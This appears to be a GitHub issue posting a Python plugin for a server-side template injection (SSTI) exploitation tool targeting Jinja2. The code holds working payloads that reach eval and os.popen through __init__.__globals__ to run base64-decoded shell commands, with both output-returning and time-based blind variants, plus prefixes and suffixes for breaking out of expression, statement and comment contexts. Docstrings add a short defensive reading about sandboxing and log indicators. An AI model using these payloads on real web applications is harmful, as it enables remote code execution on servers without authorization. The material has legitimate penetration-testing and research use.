
quick fix for jinja2 non blind shell capabilities #44

@bUst4gr0

Description

@bUst4gr0
from plugins.languages import python
from utils import rand
from core import bash



class Jinja2(python.Python):
    """Jinja2 plugin: payload templates and injection contexts for SSTI testing.

    Extends the generic Python plugin with Jinja2 expression syntax. The
    doubled braces in the templates suggest the strings are later passed
    through ``str.format`` by the framework -- TODO confirm against the base
    class.

    Defensive reading: the evaluate/execute templates all rely on reaching
    ``__init__.__globals__`` from an object exposed to the template (``self``
    or ``namespace``). That attribute chain is the indicator to look for in
    request logs. Jinja2's ``SandboxedEnvironment`` rejects access to such
    internal attributes, and the root-cause fix is to never build template
    source from request data.
    """

    def init(self):
        """Register the Jinja2 action templates and the injection contexts."""
        # Reflection check: a tuple containing a product is rendered through
        # the `e` (escape) filter; the expected value is Python's own repr of
        # the same tuple.
        render_action = {
            'render': '{code}',
            'header': '{{{{{header[0]}+{header[1]}}}}}',
            'trailer': '{{{{{trailer[0]}+{trailer[1]}}}}}',
            'test_render': f'{{{{({rand.randints[0]},{rand.randints[1]}*{rand.randints[2]})|e}}}}',
            'test_render_expected': f'{(rand.randints[0],rand.randints[1]*rand.randints[2])}',
        }

        # Python evaluation: `eval` is reached via
        # self.__init__.__globals__.__builtins__. The inner eval decodes the
        # url-safe base64 `code_b64` placeholder into a string, the outer eval
        # evaluates that string.
        evaluate_action = {
            'evaluate': """{{{{self.__init__.__globals__.__builtins__.eval(self.__init__.__globals__.__builtins__.eval('__import__("base64").urlsafe_b64decode("{code_b64}").decode()'))}}}}""",
            # The author noted __import__("platform").platform() as an
            # alternative OS probe.
            'test_os': 'sys.platform',
            'test_os_expected': r'[a-z]+',
        }

        # Non-blind command execution: `os` is reached via
        # namespace.__init__.__globals__ and popen(...).read() puts the
        # command output into the rendered page. 'call': 'render' presumably
        # routes this action through the render action -- verify in the core.
        execute_action = {
            'call': 'render',
            'execute': """{{{{namespace.__init__.__globals__.os.popen('$(echo "{code_b64}"|base64 -d)').read()}}}}""",
            'test_cmd': bash.os_print.format(s1=rand.randstrings[2]),
            'test_cmd_expected': rand.randstrings[2],
        }

        # Blind variant: nothing is read back; the trailing `sleep {delay}`
        # presumably lets the caller infer success from response time.
        blind_action = {
            'execute_blind': """{{{{namespace.__init__.__globals__.os.popen('$(echo "{code_b64}"| base64 -d) && sleep {delay}')}}}}""",
        }

        self.update_actions({
            'render': render_action,
            'evaluate': evaluate_action,
            'execute': execute_action,
            'execute_blind': blind_action,
        })

        closures = python.ctx_closures
        injection_contexts = [
            # Plain text context, nothing to close.
            {'level': 0},
            # Injection point inside an expression: {{%s}}
            {'level': 1, 'prefix': '{closure}}}}}', 'suffix': '', 'closures': closures},
            # Injection point inside a statement: {% %s %}
            {'level': 1, 'prefix': '{closure}%}}', 'suffix': '', 'closures': closures},
            # Line statements (if / for blocks):
            #   # if %s:\n# endif
            #   # for a in %s:\n# endfor
            {'level': 5, 'prefix': '{closure}\n', 'suffix': '\n', 'closures': closures},
            # Injection point inside a comment block: {# %s #}
            {'level': 5, 'prefix': '#}}', 'suffix': '{#'},
        ]
        self.set_contexts(injection_contexts)


    Labels

    bug (Something isn't working), enhancement (New feature or request)
